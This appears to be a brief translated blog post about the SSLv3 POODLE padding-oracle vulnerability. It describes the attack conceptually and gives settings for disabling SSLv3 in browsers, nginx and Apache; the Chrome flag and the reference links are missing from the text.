SSLv3 POODLE vulnerability - like BEAST, only easier

    As you may know, SSLv3 discovered the possibility of Padding Oracle attacks, which allows an attacker who has any ability to send his data to the server via SSLv3 on behalf of the victim to decrypt 1 byte for 256 requests. This is due to the fact that SSLv3 padding is not taken into account in the MAC.

    Theoretically, an attack can be implemented on any service where it is possible to influence the data sent from the attacked side. This is easiest to implement, for example, if an attacker needs to get a cookie on an HTTPS page, adding his code to HTTP pages, which makes controlled requests to HTTPS pages, and replaces encrypted blocks.

    In any case, the attacker needs to:
    • Have the ability to listen and replace the traffic of the attacked
    • Be able to make requests on behalf of the attacker with known attacking text

    Vulnerability does not depend on a specific implementation, it is by design. Although the vulnerability only affects CBC mode, it is better to disable SSLv3 completely. SSL time has passed.

    How to protect yourself?

    Disable SSLv3 on both clients and servers.

    In Firefox <34 you need to either install the addon , or
    about:config → security.tls.version.min=1
    (and in> 34 SSLv3 is disabled)

    In Chrome add
    as a startup key

    In Internet Explorer, uncheck “SSLv3” in the security settings.

    For nginx :
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

    For Apache :
    SSLProtocol All -SSLv2 -SSLv3

    For IIS

    References - checking servers - checking browsers - Whitepaper - Announcement of disabling SSLv3 on Cloudflare by default - Announcement from Google - Details on attack - Detailed description of the attack

    Also popular now: